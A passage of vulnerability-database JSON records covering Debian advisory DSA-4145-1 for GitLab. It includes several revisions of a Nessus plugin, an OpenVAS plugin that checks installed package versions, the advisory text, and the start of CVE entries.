thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 4}, "differentElements": ["modified"], "edition": 12, "lastseen": "2019-10-28T20:07:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 6, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "0120058a6f27ed038fb34981841a393e1b02f13d0cdb984215f564a4a1abced3", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "5ba3c9d875bfe1d4088cbfd233ef0c85", "key": "modified"}, {"hash": "d0083786fa4896023b7e89b86eaea16e", "key": "sourceData"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-08-30T19:57:29", "modified": "2018-04-18T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 11:50:33\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss", "modified", "sourceData"], "edition": 6, "lastseen": "2018-08-30T19:57:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 1, "enchantments": {"score": {"modified": "2018-03-20T03:37:56", "value": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/"}}, "hash": "2a6e269412a456c6174d216d62cfad928552e38b0cc7b352f38a494f6cc178b2", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "modified"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "992a68eea9ae6939e61b0ec63b778a0c", "key": "sourceData"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-03-20T03:37:56", "modified": "2018-03-19T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/03/19 16:26:29\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2018-03-20T03:37:56"}], "edition": 14, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "3f9580fb30f5ae7e1d8713dad8807aa6"}, {"key": "cvelist", "hash": "fa07a5338e88503fd255af6837f9bb02"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "94e682f572219e238e994f47a76a97b6"}, {"key": "href", "hash": "e88870015da22affb99f52db5769bb53"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "353d91f2df442080de42f503ab3f278a"}, {"key": "published", "hash": "76e8782b29cfd39782ffd31ec97c3583"}, {"key": "references", "hash": "a088969e3ffa3a71ffb3ea0f49ec5460"}, {"key": "reporter", "hash": "205fa18cac3fc8ebbd32824afb096581"}, {"key": "sourceData", "hash": "dad3bf4df09046812026f13c33e8f983"}, {"key": "title", "hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f0825fc31f1a71713baef07a65e6e7b7bd8deaa016f067bff66fd5c775ef4767", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4145-1:42E35"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704145"]}, {"type": "cve", "idList": ["CVE-2017-0925", "CVE-2017-0916", "CVE-2017-0915", "CVE-2017-0917", "CVE-2017-0918", "CVE-2017-0926", "CVE-2018-3710"]}, {"type": "freebsd", "idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"]}, {"type": "hackerone", "idList": ["H1:298873", "H1:299473", "H1:301432"]}], "modified": "2019-12-13T06:53:31"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-12-13T06:53:31"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "108422", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "scheme": null}

{"openvas": [{"lastseen": "2019-07-04T18:56:09", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\nArbitrary code execution in project import.\n\nCVE-2017-0916\nCommand injection via Webhooks.\n\nCVE-2017-0917\nCross-site scripting in CI job output.\n\nCVE-2017-0918\nInsufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\nInformation disclosure in Services API.\n\nCVE-2017-0926\nRestrictions for disabled OAuth providers could be bypassed.", "modified": "2019-07-04T00:00:00", "published": "2018-03-18T00:00:00", "id": "OPENVAS:1361412562310704145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704145", "title": "Debian Security Advisory DSA 4145-1 (gitlab - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4145-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704145\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_name(\"Debian Security Advisory DSA 4145-1 (gitlab - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-18 00:00:00 +0100 (Sun, 18 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4145.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"gitlab on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 8.13.11+dfsg1-8+deb9u1.\n\nWe recommend that you upgrade your gitlab packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/gitlab\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\nArbitrary code execution in project import.\n\nCVE-2017-0916\nCommand injection via Webhooks.\n\nCVE-2017-0917\nCross-site scripting in CI job output.\n\nCVE-2017-0918\nInsufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\nInformation disclosure in Services API.\n\nCVE-2017-0926\nRestrictions for disabled OAuth providers could be bypassed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"gitlab\", ver:\"8.13.11+dfsg1-8+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:16", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4145-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 18, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : gitlab\nCVE ID : CVE-2017-0915 CVE-2017-0916 CVE-2017-0917 CVE-2017-0918 \n CVE-2017-0925 CVE-2017-0926 CVE-2018-3710\n\nSeveral vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\n\n Arbitrary code execution in project import.\n\nCVE-2017-0916\n\n Command injection via Webhooks.\n\nCVE-2017-0917\n\n Cross-site scripting in CI job output.\n\nCVE-2017-0918\n\n Insufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\n\n Information disclosure in Services API.\n\nCVE-2017-0926\n\n Restrictions for disabled OAuth providers could be bypassed.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 8.13.11+dfsg1-8+deb9u1.\n\nWe recommend that you upgrade your gitlab packages.\n\nFor the detailed security status of gitlab please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gitlab\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-03-18T18:51:35", "published": "2018-03-18T18:51:35", "id": "DEBIAN:DSA-4145-1:42E35", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00071.html", "title": "[SECURITY] [DSA 4145-1] gitlab security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Enterprise Edition version 10.1.0 is vulnerable to an insufficiently protected credential issue in the project service integration API endpoint resulting in an information disclosure of plaintext password.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0925", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0925", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to a lack of input validation in the 